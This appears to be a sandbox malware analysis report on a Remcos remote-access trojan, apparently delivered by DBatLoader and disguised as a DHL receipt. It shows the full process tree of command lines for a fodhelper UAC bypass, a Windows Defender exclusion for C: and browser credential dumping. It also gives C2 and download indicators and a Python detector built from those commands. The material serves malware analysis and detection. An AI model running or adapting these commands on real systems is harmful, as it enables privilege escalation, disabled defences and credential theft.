
Windows Analysis Report
DHL119040 receipt document,pdf.exe

Overview

General Information

Sample name: DHL119040 receipt document,pdf.exe
Analysis ID: 1471440
MD5: 0db7fbc1b1d0af0a9503401691f95e30
SHA1: e93bb010d9df4bb5df8203429d228d4748976747
SHA256: f2df2225b522198984f1c38654f2d06f2855a0efc8c57d87f566ea21e5c68cab
Tags: exe, RAT, RemcosRAT

Detection

Detected: Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Process Tree

  • System is w10x64
  • DHL119040 receipt document,pdf.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
    • yfkwifxL.pif (PID: 7476 cmdline: C:\Users\Public\Libraries\yfkwifxL.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • cmd.exe (PID: 7536 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • extrac32.exe (PID: 7616 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7700 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7720 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7744 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7760 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7784 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7804 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7844 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7860 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7884 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • xkn.exe (PID: 7900 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
            • alpha.exe (PID: 8076 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • ger.exe (PID: 8096 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • per.exe (PID: 6904 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • alpha.exe (PID: 7720 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • taskkill.exe (PID: 7760 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • alpha.exe (PID: 6016 cmdline: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • PING.EXE (PID: 7788 cmdline: ping 127.0.0.1 -n 2 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • alpha.exe (PID: 5852 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 2992 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 8108 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 8088 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7308 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7416 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7456 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • extrac32.exe (PID: 7520 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • remcos.exe (PID: 7596 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • remcos.exe (PID: 8144 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • remcos.exe (PID: 8152 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • remcos.exe (PID: 8168 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
  • SystemSettingsAdminFlows.exe (PID: 5316 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • remcos.exe (PID: 8132 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
  • remcos.exe (PID: 3844 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
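What the tree above shows, in order: the loader copies itself to C:\Users\Public\Libraries as a .pif and runs a batch file that uses extrac32 to copy cmd.exe, reg.exe and powershell.exe into C:\Users\Public under new names (alpha, ger, xkn), creates a mock trusted directory "C:\Windows \System32" (trailing space, kept only because mkdir is given the \\?\ prefix), copies fodhelper.exe there as per.exe, sets HKCU\Software\Classes\ms-settings\shell\open\command to a hidden PowerShell that adds a Windows Defender exclusion for C:\, launches per.exe from the mock directory so the auto-elevation path check sees a System32 binary (the TrustedPath pattern the Sigma rule names) and the ms-settings handler runs elevated, kills the SystemSettings.exe window that fodhelper opens, uses ping as a sleep, and deletes the copies. The detection logic below is an added example, not Joe Sandbox code and not part of the sample. It runs over process-creation records constructed from the command lines in the tree (the pid/image/cmdline/parent_image field names and the label strings are assumptions, not a real Sysmon or EDR schema) and flags the techniques the report's signatures name. Every rule keys on the command line or the path rather than the image name, because reg.exe and powershell.exe run here as ger.exe and xkn.exe.

```python
"""Detection logic for the loader chain in the process tree above. Added example,
not Joe Sandbox code and not part of the sample; the records are constructed from
the report's command lines, and the field names are an assumption, not a real
Sysmon/EDR schema."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str

# Binaries the chain copies out under new names (cmd->alpha, reg->ger, powershell->xkn, fodhelper->per).
SYSTEM_BINARIES = {"cmd.exe", "reg.exe", "powershell.exe", "fodhelper.exe"}
# "C:\Windows \System32\" (note the space): a mock trusted directory. The \\?\ prefix
# on mkdir keeps the trailing space that normal Win32 path handling would strip.
MOCK_TRUSTED_DIR = re.compile(r'[a-z]:\\Windows [\\"]', re.I)
PUBLIC_DIR = re.compile(r"^[a-z]:\\Users\\Public\\", re.I)
# The handler auto-elevated fodhelper.exe launches for ms-settings: URIs.
MS_SETTINGS_HANDLER = re.compile(r"ms-settings\\shell\\open\\command", re.I)

def norm_path(s: str) -> str:
    return s.replace("\\\\", "\\")  # the .bat writes paths with doubled backslashes

def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()

def extrac32_src_dst(cmd: str) -> tuple[str, str] | None:
    """Split 'extrac32 /C /Y <src> <dst>'; <dst> may be quoted, <src> may contain spaces."""
    m = re.search(r"/Y\s+(.+)$", cmd, re.I)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.endswith('"'):
        q = rest.rfind('"', 0, len(rest) - 1)
        return rest[:q].strip().strip('"'), rest[q + 1:-1]
    src, _, dst = rest.rpartition(" ")
    return src.strip('"'), dst

def detect(ev: ProcEvent) -> list[str]:
    """Technique labels that fire for one process-creation event."""
    cmd, img, parent = norm_path(ev.cmdline), norm_path(ev.image), norm_path(ev.parent_image)
    low, hits = cmd.lower(), []
    if PUBLIC_DIR.search(img):
        hits.append("runs_from_public_folder")
    if PUBLIC_DIR.search(parent):
        hits.append("parent_in_public_folder")
    if MOCK_TRUSTED_DIR.search(img) or MOCK_TRUSTED_DIR.search(cmd):
        hits.append("mock_trusted_directory")
    pair = extrac32_src_dst(cmd) if basename(img) == "extrac32.exe" else None
    if pair and basename(pair[0]) in SYSTEM_BINARIES:
        hits.append("extrac32_copies_system_binary")
        if basename(pair[1]) != basename(pair[0]):
            hits.append("system_binary_renamed")
    # Key on the command line, not the image: reg.exe runs here as ger.exe.
    if MS_SETTINGS_HANDLER.search(cmd) and re.search(r"\badd\b", low):
        hits.append("ms_settings_handler_hijack")
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_added")
    if "/stext " in low:  # NirSoft-style "save as text" switch of the embedded recovery tool
        hits.append("stext_credential_dump")
    if basename(img) == "taskkill.exe" and "systemsettings.exe" in low:
        hits.append("kills_systemsettings")
    return hits

def triage(events: list[ProcEvent]) -> dict[str, list[int]]:
    """Map each label to the sorted PIDs it fired on."""
    out = defaultdict(list)
    for ev in events:
        for label in detect(ev):
            out[label].append(ev.pid)
    return {k: sorted(v) for k, v in out.items()}

def uac_bypass_chain_present(events: list[ProcEvent]) -> bool:
    """Mock dir created, ms-settings handler set, and a binary actually run from the mock dir."""
    labels = triage(events)
    ran_from_mock = any(MOCK_TRUSTED_DIR.search(norm_path(e.image)) for e in events)
    return "mock_trusted_directory" in labels and "ms_settings_handler_hijack" in labels and ran_from_mock

# Constructed sample: (pid, image, cmdline, parent_image) copied from the report's process tree.
EVENTS = [ProcEvent(*t) for t in [
    (7476, r"C:\Users\Public\Libraries\yfkwifxL.pif", r"C:\Users\Public\Libraries\yfkwifxL.pif", r"C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"),
    (7616, r"C:\Windows\System32\extrac32.exe", r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"', r"C:\Windows\System32\cmd.exe"),
    (7700, r"C:\Users\Public\alpha.exe", r'C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "', r"C:\Windows\System32\cmd.exe"),
    (7860, r"C:\Windows\System32\extrac32.exe", r'extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"', r"C:\Users\Public\alpha.exe"),
    (8096, r"C:\Users\Public\ger.exe", r'C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""', r"C:\Users\Public\alpha.exe"),
    (6904, r"C:\Windows \System32\per.exe", r'"C:\\Windows \\System32\\per.exe"', r"C:\Windows\System32\cmd.exe"),
    (7760, r"C:\Windows\System32\taskkill.exe", r"taskkill /F /IM SystemSettings.exe", r"C:\Users\Public\alpha.exe"),
    (8144, r"C:\ProgramData\Remcos\remcos.exe", r'C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"', r"C:\ProgramData\Remcos\remcos.exe"),
    (7556, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", r"C:\Windows\System32\cmd.exe"),  # benign control
]]

if __name__ == "__main__":
    print(triage(EVENTS), uac_bypass_chain_present(EVENTS))
```

`uac_bypass_chain_present` deliberately requires all three stages: the mock directory alone is created by some installers' bugs, and an ms-settings handler write alone is what a fodhelper bypass looks like without the trusted-path trick; the combination with an image launched from "C:\Windows \" is what this sample does. The conhost record is a negative control and fires nothing.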
Malware family: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware family: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

DBatLoader configuration: {"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}

Remcos configuration: {"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (dropped files)

Source: C:\ProgramData\trhrth\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Yara matches (memory dumps)

Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x14a8:$a1: Remcos restarted by watchdog!
  • 0x1a20:$a3: %02i:%02i:%02i:%03i
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4c0:$a1: Remcos restarted by watchdog!
  • 0x6ca38:$a3: %02i:%02i:%02i:%03i
Source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
(23 further memory-dump matches not reproduced)

Yara matches (unpacked PEs)

Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(7 further unpacked-PE matches not reproduced)

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 6904, ProcessName: per.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yfkwifxL.pif, NewProcessName: C:\Users\Public\Libraries\yfkwifxL.pif, OriginalFileName: C:\Users\Public\Libraries\yfkwifxL.pif, ParentCommandLine: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe", ParentImage: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ParentProcessId: 7380, ParentProcessName: DHL119040 receipt document,pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, ProcessId: 7476, ProcessName: yfkwifxL.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Lxfiwkfy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfiwkfy
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7784, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ProcessId: 7804, ProcessName: extrac32.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
